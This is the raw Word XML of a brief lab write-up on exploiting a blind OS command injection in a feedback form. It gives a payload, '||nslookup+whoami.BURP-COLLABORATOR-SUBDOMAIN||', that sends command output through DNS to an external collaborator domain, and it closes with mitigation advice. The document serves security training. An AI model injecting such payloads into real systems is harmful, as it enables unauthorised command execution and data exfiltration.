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6D22001B" w14:textId="04387C38" w:rsidR="004602F1" w:rsidRPr="002D7CF4" w:rsidRDefault="00F5421E" w:rsidP="002D7CF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F5421E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The feedback feature of the application appears to have a blind OS command injection vulnerability. The aim is to exfiltrate the output from the executed command using an out-of-band mechanism, specifically, a DNS query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184E32A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AC7B0B5" w14:textId="77777777" w:rsidR="009005E1" w:rsidRPr="009005E1" w:rsidRDefault="009005E1" w:rsidP="00900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005E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Use Burp Suite Pro to intercept the feedback submission request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D2E8FF" w14:textId="77777777" w:rsidR="009005E1" w:rsidRPr="009005E1" w:rsidRDefault="009005E1" w:rsidP="00900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005E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Introduce our payload into the email parameter, which will perform the command and send its result to an external domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41477855" w14:textId="4C841FEA" w:rsidR="004602F1" w:rsidRPr="009005E1" w:rsidRDefault="009005E1" w:rsidP="00900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005E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Poll the external domain for incoming data to extract the result of our executed command.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3CEBAE15" w:rsidR="00154E92" w:rsidRPr="00154E92" w:rsidRDefault="00F411EB" w:rsidP="00154E92">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F411EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>For the email parameter: ||</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F411EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nslookup+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F411EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>whoami.BURP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F411EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>-COLLABORATOR-SUBDOMAIN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F411EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160CD52F" w14:textId="179541CA" w:rsidR="00190CC4" w:rsidRDefault="000A670C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670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CACB1EE" wp14:editId="482AE796">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1169670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5314950" cy="3742690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="7200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73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50C1527E" w:rsidR="004602F1" w:rsidRDefault="00AC26C7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2CAC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702DC19" wp14:editId="0757DCE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362575" cy="3456305"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="169759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78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42A4D27F" w14:textId="77777777" w:rsidR="00AC26C7" w:rsidRPr="00AC26C7" w:rsidRDefault="00AC26C7" w:rsidP="00AC2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26C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC26C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC26C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> user input in any system-level functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C21B6" w14:textId="77777777" w:rsidR="00AC26C7" w:rsidRPr="00AC26C7" w:rsidRDefault="00AC26C7" w:rsidP="00AC2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26C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Monitor outgoing connections from the application server to detect unexpected interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395F704" w14:textId="3969A518" w:rsidR="004602F1" w:rsidRPr="00BD38A6" w:rsidRDefault="00AC26C7" w:rsidP="00711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38A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Regularly test and patch the application to prevent such vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004602F1" w:rsidRPr="00BD38A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A670C"/>
    <w:rsid w:val="000F51F2"/>
    <w:rsid w:val="00154E92"/>
    <w:rsid w:val="00171562"/>
    <w:rsid w:val="00190CC4"/>
    <w:rsid w:val="001B4B7C"/>
    <w:rsid w:val="001D1DD6"/>
    <w:rsid w:val="002D7CF4"/>
    <w:rsid w:val="00312673"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003A2CAC"/>
    <w:rsid w:val="004602F1"/>
    <w:rsid w:val="00467FE3"/>
    <w:rsid w:val="004A26EF"/>
    <w:rsid w:val="004C7899"/>
    <w:rsid w:val="007D6747"/>
    <w:rsid w:val="009005E1"/>
    <w:rsid w:val="00AC26C7"/>
    <w:rsid w:val="00BD38A6"/>
    <w:rsid w:val="00C26772"/>
    <w:rsid w:val="00E940C1"/>
    <w:rsid w:val="00F411EB"/>
    <w:rsid w:val="00F5421E"/>
    <w:rsid w:val="00FA71E2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2023-10-08T18:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-08T18:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>